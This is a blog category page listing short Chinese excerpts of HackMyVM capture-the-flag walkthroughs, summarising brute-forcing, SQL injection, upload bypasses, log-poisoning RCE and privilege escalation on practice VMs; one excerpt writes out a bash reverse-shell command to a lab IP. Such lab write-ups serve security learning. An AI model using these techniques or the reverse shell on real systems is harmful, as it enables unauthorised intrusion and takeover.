![](https://img-blog.csdnimg.cn/20201014180756922.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
hackmyvm
文章平均质量分 60
tao0845
萌新,做些简单的记录
展开
-
[HackMyVM]靶场Birthday
发现/usr/bin/ansible-playbook /etc/ansible/install.yml 会被定时执行。源码没什么东西,只有一张图片,进行隐写分析后发现并没有什么隐写,唯一利用点只剩url了。3.将/var/www/html打包成/var/backup/site.zip。4.执行who的指令,将结果输出到/tmp/who.txt。2.安装/opt/packages/下面的debian包。1.执行/opt/script.sh这个脚本。好消息端口不是很复杂 22 80两个端口。原创 2024-04-06 12:19:45 · 848 阅读 · 0 评论 -
[HackMyVM]靶场Deeper
我拿去直接爆破ssh发现失败了,重新回到网页源码发现下面还藏了东西。由于没有python服务,我用scp传到了kali。先16进制转字符串然后base64就解码拿到密码。开启了22 80两个端口,先简单地扫一下目录。然后su到root就能拿到root flag。alice用户下还有.bob.txt。扫不出来什么东西,直接去web看。bob目录下有个root.zip。应该是bob的密码,同理解密。拿到一个用户名 ALICE。轻松拿到user flag。让我去deeper目录。用密码bob成功解开。原创 2024-04-05 20:25:16 · 306 阅读 · 0 评论 -
[HackMyVM]靶场Logan2
发现system不能用,那就用popen,结果发现自己是root了,那就把user flag和root flag都交了。那就只能使用文件包含,想到扫目录的时候扫到一个config.php,里面可能有东西。发现可以apache日志包含,那就可以实现rce了,不过我的rce总是不能实现。然后用执行phpinfo的时候发现命令执行函数都被ban了。觉得终端用不习惯的也可以弹个shell,都一样。有个子域,先添加到hosts。个人习惯,弹到kali上。不给看,那就执行以下看看。测试发现可以目录穿越。原创 2024-04-04 21:12:24 · 391 阅读 · 0 评论 -
[HackMyVM]靶场Economists
尝试用获取的username爆破一下ssh,用rockyou没爆破出来,可能字典不对,用cewl获取网页单词生成字典。好多pdf文件,get下来看了一下,pdf上面没什么东西,分析一下有什么username。拿到一组账号密码 joseph:wealthiest。然后再底端命令行输入!bash就拿到了root权限。开启端口:21 22 80。直接拿到user flag。拿到几个用户名,可能有用。试一下ftp匿名登录。这才是easy难度的。原创 2024-04-04 19:31:21 · 306 阅读 · 0 评论 -
[HackMyVM]靶场Boxing
看到群里大佬发现boxing.hmv:pass@127.0.0.1:5000/?我们可以 添加一个参数-f 变成file -f filename就能输出文本内容。另一个监听窗口下就能获得一个1.txt,里面就是/root/root.txt。当前目录是/opt/pidstat而不是/var/www/html。当user.txt文件属性修改的时候就会触发 sos.sh这脚本。在sos.sh里面,有file *,这个在之前某一个靶机遇到过。进入看看,这个数据库第一次用,.tables可以查看表。原创 2024-04-03 22:54:31 · 391 阅读 · 0 评论 -
[HackMyVM]靶场Flossy
脚本会将opt目录下的文件复制到/etc/NetworkManager/dispatcher.d/并赋予可执行权限,那就可以写个脚本再opt里面,然后执行disp,就会把它复制到/etc/NetworkManager/dispatcher.d/这个脚本会发送 sophie的私钥,但是tty得是/dev/pts/24。sophie用户有user flag,但是没有权限读。没有找到,把character修改成user看一下。目前tty是/dev/pts/0。好像有东西了,爆破一下id。去web看看什么情况。原创 2024-04-01 21:44:36 · 324 阅读 · 0 评论 -
[HackMyVM]靶场Pipy
开了22 80两个端口扫一下目录还是有很多东西的去web看一下我去扫出来的几个目录看了一下没有发现什么有用的信息那就看框架有什么漏洞,源码发现是SPIP 4.2.0的框架然后搜到了一个cve。原创 2024-03-31 21:27:07 · 256 阅读 · 0 评论 -
[HackMyVM]靶场Zurrak
127.0.0.1的smb会执行emergency.sh脚本,那么我们劫持一下然后反弹shell。回到index.php,抓包发现cookie里面有token也是一个jwt,解析一下。跳转到New folder可以用cd "New folder",不然有空格挂载不了。md我不知道该如何下载到我的kali上,这里先不说,继续。有密码了,但是没有用户名,猜测是exe文件名asli。连接成功(后面我都不会,看着wp做的,也记录一下)这次不一样了,多一个isAdmin参数。一个朴素的登录界面,源码里给了账号密码。原创 2024-03-30 19:37:19 · 902 阅读 · 0 评论 -
[HackMyVM]靶场Factorspace
不管了,后面就是通过wireshark抓192.168.56.138的udp包,报文里面有个私钥,用私钥登录root就能拿到root权限。无奈之下去看了一手wp,发现他们在ss -tulnp有个特殊的udp,为什么我没有,靶机重启了一下还是没有,我淦。就是']把前面的['闭合, 后面的['闭合后面的'],然后//*是列出文档中的所有元素。直接去那几个php看试了一下其他几个都会跳转到login.php,那么只能从这里下手。有login ,result,check,auth应该是登录相关的php。原创 2024-03-30 11:43:48 · 596 阅读 · 0 评论 -
[HackMyVM]靶场Darkside
抓包发现cookie里面有个side=whiteside,根据源码泄露改成darkside并修改一下目录添加。sh 1>&0 2>&0就能拿到root shell。给出了kevin的密码kevin/ILoveCalisthenics。传linpeas看一下,也没扫到什么东西,前面肯定有东西遗漏。登录界面,根据前面投票结果猜测用户名是kevin,密码爆破一下。我淦,kevin的历史指令泄露了rijaba的密码,粗心了。开启了22 80两个端口,常规扫一下目录。貌似是一些用户名,最后祝凯文好运。原创 2024-03-28 21:10:30 · 436 阅读 · 1 评论 -
[HackMyVM]靶场quick5
靶机刚出来的时候自己就做到了这里就卡住了,当时想到的是那种钓鱼pdf,下载者打开就会上线那种,后来群里大佬给了思路,用msfconsole里面的openoffice模块生成一个恶意odt,当打开的时候就会执行写在里面的宏命令。怎么说,这个靶场,easy的难度,感觉不止easy。我昨天也是这样做的,但是shell没弹过来,很奇怪,我昨天也是这样做到,shell没弹过来,今天shell就弹过来了。这里好玩的是,我在一一尝试各种文件的时候,打开andrew的snap文件夹的时候发现了火狐的文件包。原创 2024-03-27 20:10:24 · 645 阅读 · 0 评论 -
[HackMyVM]靶场Crossbow
也是成功拿到user flag,怪不得polo和lea都没有user flag,原来还有一个user。根据博客作者Polo,猜测用户名是Polo,登录9090端口,测试发现用户名是polo。polo用户下没有user flag,也没有sudo -l权限,西巴。失败,看一下/etc/passwd,发现还有一个用户pedro。可以利用ssh代理劫持进入其他系统,这里有篇利用文章。进行端口转发用了ssh和nc一下就断了不知道为什么。也没有有用的信息,现在只剩下一个hash值能利用。原创 2024-03-26 23:30:06 · 949 阅读 · 0 评论 -
[HackMyVM]靶场 Minimal
这里第一个解决方案是创建一个prize->/root/root.txt的软连接,但是要在www-data用户的家目录下进行,否则在/opt/quiz下进行我们没有读取这个目录下指向/root/root.txt的软连接。但是我不知道密码,想到页面存在一个忘记密码功能,看一下后端逻辑。这里用到了一个secret_2的加密,其实就是凯撒加密,偏移量是v3就是5,解密出来是bacon pancakes。剩下的静调,计算偏移量,socat什么的我就看不懂了😓,不过学习了软连接,收获挺大。原创 2024-03-25 22:05:48 · 444 阅读 · 0 评论 -
[HackMyVM]靶场RooterRun
会将.sh文件从文件夹pre-prod-tasks复制到pre-tasks文件夹并运行它们,那么我们就可以创建一个反弹shell的sh,注意添加一下权限。linpeas.sh测一下发现/opt/maintenance/backup.sh有root权限并且定时执行。可以看到优先使用/usr/local/sbin的指令,这个是我们可以修改的。一般这种操作文件的都是定时任务,注意到用到bash。然后到pre-tasks将sh文件改一下名字。我习惯将shell反弹到kali。爆破一下加盐的hash。原创 2024-03-25 16:24:49 · 238 阅读 · 0 评论 -
[HackMyVM]靶场 Slowman
有用户gonzalo的账号密码并且给了登录界面 /secretLOGIN/login.html。想 提权root,尝试了sudo -l,无果,尝试看进程定时任务 无果。ssh连接直接拿到user flag,还有一个python历史指令。linpeas跑一下发现python有capabilities。爆破出来账号密码是trainerjeff/soccer1。那就python的capabilities提权了。21端口匿名登陆,把passive模式关了。用john爆破一下这个hash。一下就爆出来了密码是。原创 2024-03-24 16:07:02 · 341 阅读 · 0 评论 -
[HackMyVM]靶场 Submissions
binwalk stegeek都看了一下没什么东西。ssh连接之后henry目录下又user flag。我用gobuster不知道为什么扫描失败。学了一下巨魔,使用feroxbuster。索性vim看到了一个base64字符串。进去发现是个图片,那大概率是隐写了。爆破出来密码leahcim1996。easy难度的靶场开的端口就是少。web界面看了一下没什么东西。用hydra爆破一下ssh。base64解码拿到文件名。还有一个Note.txt。又学到一个工具cupp。切换到henry用户。原创 2024-03-24 12:08:55 · 216 阅读 · 0 评论 -
[HackMyVM]靶场 XMAS
可以用root权限执行 /usr/bin/java /home/alabaster/PublishList/PublishList.jar。发现会定时执行一个python脚本/opt/NiceOrNaughty/nice_or_naughty.py。并且这个jar是alabaster用户的,我们可以自己重写一个jar反弹用来反弹shell。这个py文件是可以修改的,那么直接改成反弹shell。通过目录扫面可以初步判断有文件上传。kali开个监听然后登就行了。web往下滑看到文件上传点。原创 2024-03-22 18:35:57 · 494 阅读 · 0 评论 -
[HackMyVM]靶场 Nebula
第一种方法,因为我们可以write 这个head,所以可以手改head,注意修改环境变量,把head改成我们修改的head。ssh连接之后发现pmccentral没有user flag,用户目录下有个employees的文件,里面全是人名。成功跳转到laboratoryadmin用户,并且用户目录下有user.txt拿到第一个flag。第二种,就利用原来的head,因为它里面是bash -p也能让我们拿到root权限。经过md5碰撞发现pmccentral的密码是999999999。原创 2024-03-22 13:01:32 · 530 阅读 · 0 评论 -
[HackMyVM]靶场 Liceo
但是我在提权root时候遇到了问题,没有什么敏感文件,也没有定时任务,也没有suid提权,也没有什么root权限脚本...搜索一番知道home目录下.bash_profile .bashrc这两个文件被删了就会出现这种情况。然后回到这个bash上,一般bash都是www-data,为什么这次是bash-5。测试发现不准上传php文件,但可以上传phtml文件。用phtml上传一个一句话马,然后弹个shell。然后尝试用bash -p就拿到了root权限。upload.php可以文件上传。原创 2024-03-22 11:19:22 · 453 阅读 · 0 评论 -
[HackMyVM]靶场 Pyrat
经过翻文件,在/opt/dev/.git/config下翻到了用户think的密码。nc连接之后 输入admin 再输入密码再输入shell就能拿到root。nc连上之后,经过测试发现可以执行python语句。wp给了两个脚本,第二个部分就是爆破。最后爆破出来密码是september。里面找到一个py脚本,不过没什么用。这里直接看wp了,给了一个爆破脚本。开启了22 8000两个端口。在github上面有东西。根据readme 的提示。然后也没有suid提权。原创 2024-03-19 16:15:13 · 204 阅读 · 0 评论 -
[HackMyVM]靶场 Zon
经过测试,修改文件头,%00隔断都没用,最后一句话马用shell.jpg .php(注意有一个空格)的名字成功上传。上传要求是zip里面包一个jpeg文件,然后再uploads里面就能看到这个文件。进去找到了Freddie的密码,测试发现用户名首字母小写。经过一一测试发现choose.php可以文件上传。bash就能拿到root权限。发现一个可疑文件hashDB.sh。reportbug可以提权。总结:文件上传空格绕过。泄露了数据库账号密码。运行之后我就乱按一通。原创 2024-03-18 18:49:49 · 295 阅读 · 0 评论 -
[HackMyVM] Quick
测试发现url可以RFI,注意把文件末尾的.php去掉,因为该网站会自动添加.php。找到SUID权限发现php7有suid权限。现在可以直接拿到userflag。原创 2024-03-17 14:28:56 · 301 阅读 · 0 评论 -
[HackMyVm] Vinulizer
usr/lib/python3.10/random.py是有修改权限的,正好又是导入的那个random模块。shopadmin的password经过md5解密得到addicted2vinyl。/opt/vinylizer.py有root权限。在login界面测试发现可以sql注入。打开发现引入json和random模块。但是文件不可修改,只能从模块下手。但是登录不上网页可以连接ssh。抓包放到sqlmap里面跑。lana登录发现没有东西。在import的下面加上。原创 2024-03-13 23:09:13 · 232 阅读 · 0 评论 -
[HackMyVm] Quick
测试发现123@qq.com 和123@qq.com'#结果相同,123@qq.com'报错,说明存在sql注入。根据数据库爆破出来的uploads/3_andrew.jpg猜测上传的头像位置在这。发现比前几个quick系列多出来了employee目录。字段就dump了几条没发现有用的东西,密码也登不上。但是登录界面可以用万能密码登上去。home目录下有user.txt。添加一个GIF的文件头上传成功。前面的数字试到2找到了文件位置。sqlmap跑一下请求包。上传一句话木马时候提示。在查看进程的时候发现。原创 2024-03-12 15:30:41 · 449 阅读 · 0 评论 -
[HackMyVM]靶场 Espo
发现是个定时执行的任务,一分钟执行一次,并且UID是1000,是mandie的权限,如果在脚本里面添加一条反弹shell的指令,我们就能拿到mandie的权限,但是发现无法编辑这个文件。但是用directory-list-2.3-medium.txt和common.txt 都不跑,换个字典。mandie目录下有user.txt但是权限不够,而且有个奇怪的可执行文件copyPics。web源码里面显示2022,所以我就找2022及以后的cve。好像直接越步了,无所谓,照样能拿到user和root。原创 2024-03-10 13:11:52 · 538 阅读 · 0 评论 -
[HackMyVM]靶场 Zeug
总结:1.SSTI注入绕过,可以先上传一个反弹shell的sh文件然后再bash执行。v5是个伪随机数,如果v5^输入的值为-559038737则拿到shell。尝试将exia.so的共享库加载到/home/exia目录中。尝试反弹shell无法执行,打算上传个反弹shell的脚本。在exia用户下,/user/bin/zeug可以提权。那么就把模板注入放在html的body里面,确实可以。/home/exia/seed 可以提权到exia。跟之前wild靶场利用一样链接库劫持。/console确实存在。原创 2024-03-08 21:41:47 · 674 阅读 · 0 评论 -
[HackMyVM]靶场 Run
创建.gitea/workflows目录并写入一个反弹shell的yaml文件。然后用dev/developer88登录gitea。6.2.0-20-generic搜索知道有个CVE。运行actions需要运行器,下载一个运行器。然后在setting里面开启action。在设置添加runner里面获取token。之前开的监听端口也是返回了shell。密码是developer88。ip地址就是instance。不过目前还在docker里面。不过在历史文件里面可以看到。打开是一个gitea服务。原创 2024-03-07 23:34:56 · 541 阅读 · 1 评论 -
[HackMyVM]靶场 Wild
username为realm然后再对username:realm:password进行md5加密再转16进制。在/domain/configuration/mgmt-users.properties里面发现点东西。在host-primary.xml里面发现realm name为ManagementRealm。i的16进制编码是%69,%的16进制编码是25,所以可以用%2569表示i。看下面的php源码,知道网页对iconv,/,..进行了过滤。又因为源码中过滤了iconv,可以进行双重编码绕过。原创 2024-03-06 13:55:22 · 1035 阅读 · 0 评论 -
[HackMyVM]靶场 Quick3
在myprofile里面发现可以修改密码,并且原密码只是单纯的被遮盖,在源码里可以看到。然后就是翻文件,在customer里面的配置文件里面有root的密码。发现shell是rbash,输入bash拿到正常shell。更关键的是,在url中修改id可以直接读取其他用户的密码。注册个账号进入1@qq.com/1。处理一下,用姓作为username。成功登录root拿到flag。ssh连接拿到user权限。总结:越权,爬虫,配置文件。开启了22 80 端口。爬虫爬一下用户名密码。原创 2024-03-04 18:41:19 · 604 阅读 · 0 评论 -
[HackMyVM]靶场 VivifyTech
在wp-includes里面发现一个secret.txt可以作为一个密码字典。/bin/bash或者!bash拿到root权限。注意到wp里面除了helloworld还有一篇文章里面有几个人名。给了gbodja/4Tch055ouy370N。wpscan没爆出来ssh也没爆出来。添上wordpress再扫一下。把名字首字母改成小写后爆了出来。用户名sancelisso。ssh连接拿到user权限。wpscan扫一下用户名。但是一个用户名太少了,添加到user.txt。web界面没什么东西。原创 2024-03-02 22:12:17 · 445 阅读 · 0 评论 -
[HackMyVM] 靶场 Wave
Wine 是一个在 x86、x86-64 上允许类 Unix 操作系统在 X Windows System 下运行 Microsoft WIndows 程序的软件。Wine 最早是“Windows Emulator”,即 Windows 模拟器的所写,但现在为“Wine Is Not an Emulator”的缩写,即 Wine 不是模拟器。Wine 的正确名称是“Wine”,而不是全大写或全小写。sudo -l发现/usr/bin/wine有免密root权限。切换到交互式shell。原创 2024-03-02 10:49:24 · 695 阅读 · 0 评论 -
[HackMyVM]靶场 Adria
先是读取/root/pass里面的密码,然后让用户输入一个密码,如果两个密码相等,html文件压缩再用PASSWORD加密。自己测试上传发现php文件不行,看了exp需要将后缀改成phar,改完之后可以RCE了。找了一下没有利用点,找找后台,源码里发现这是个Subrion 4.2的CMS。那么如果此时用pspy64监控进程,那么比较的密码我们就能抓取。里面没什么有用的东西,注册需要邮箱,这里本地注册不了。因为开启了smb服务,用enum4linux扫一下。网上搜一下,没看到后台,但是发现有个文件上传漏洞。原创 2024-03-01 22:46:45 · 376 阅读 · 0 评论 -
[HackmyVM]靶场 W140
还需要修改环境变量让执行Benz-w140的时候优先执行 tmp目录下的find。测试发现必须二进制内容为png或者jpeg格式才行,对文件名和文件类型并不检测。因为没有回显,直接反弹shell,注意对反弹shell指令base64编码。用于清理日志文件和将图片所有者和所属组改为root root。而这个find指令没有明确的目录,所有我们可以伪造find。再/var/www目录看到一个隐藏的png文件。发现service.html可以文件上传。sudo -l发现可以提权。开启了22 80 端口。原创 2024-02-29 19:44:23 · 622 阅读 · 0 评论 -
[HackmyVM] Coffee Shop
自己在tmp目录创一个反弹shell的脚本,当任务执行的时候就能拿到shopadmin的shell。虽然shopadmin用户文件不能用ls查看,但是在定时任务里面发现了一个.sh文件。进去发现只有login界面有用,但是不知道账号密码。注意这个*,我们可以插入我们自己写的rb脚本来执行。看web文件发现login.php里面有东西。然后扫一下目录,扫半天就有个shop路由。它会定时执行/tmp里面的sh文件。给了个域名,先添加到host里面。里面有shopadmin的密码。给了ssh的账号密码连接一下。原创 2024-02-28 12:49:50 · 291 阅读 · 0 评论 -
[HackmyVM]靶场 Azer
错误执行bash脚本,命令失败 admin admin,难道是把我输入的账号密码当成指令了吗。结果很简单,就是把输入的username和password拼接到$1和$2。curl一下10.10.10.0/24这个段,我一个一个试的...其他啥文件也没什么好用的,查看ip,发现有docker服务。发现10.10.10.10有东西,测试发现是root密码。提示不在仓库,意味着pwd可能执行了,但是没有回显。shell语法有问题,可能是某个分号多余了。一直在那转,看源码也没什么有用的东西。原创 2024-02-27 20:16:10 · 259 阅读 · 0 评论 -
BlackWidow靶场
编码前1=bash -c 'bash -i >& /dev/tcp/192.168.223.128/4567 0>&1'之前端口扫描的时候80端口是apache服务,那么可以利用apache日志包含来进行rce。apache2日志目录在/var/log/apache2/access.log。继续翻文件,翻了一圈没什么常规的提权手段,用工具linpeas.sh扫描。找到viper的密码?V1p3r2020!上面提示文件还包含的参数是file。有个company目录,进入看看。可以看到确实能读取日志文件。原创 2024-02-26 17:05:20 · 691 阅读 · 0 评论